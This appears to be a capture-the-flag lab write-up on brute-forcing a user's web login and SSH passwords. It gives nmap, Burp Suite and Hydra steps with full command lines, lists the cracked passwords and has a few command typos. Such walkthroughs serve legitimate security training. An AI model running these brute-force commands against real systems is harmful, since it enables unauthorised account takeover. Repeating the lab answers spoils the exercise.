- Use Hydra to bruteforce molly’s web password. What is flag 1?
Scan open ports
nmap -p- <ip>
Access HTTP site, try logging-in to see what happen
Seems like I don’t have correct credentials.
View source shows nothing
Intercept with Burp Suite. It’s POST request.
Try SQL injection, but It’s not work neither.
Without any further information. I’ll have to brute-forcing with hydra
Craft the command.
hydra -l molly -P rockyou.txt <ip> http-post-form "/loginusername=^USER^&password=^PASS^:F=Your username or password is incorrect." -V
Run the command
Result -> molly:sunshine
Login, now I have first flag.
2. Use Hydra to bruteforce molly’s SSH password. What is flag 2?
hydra -l molly -P Desktop/rockyou.txt 10.10.138.145 ssh -t 4
Result -> molly:butterfly
SSH login
ssh molly@<ip>
Read flag file
ls cat flag2.txt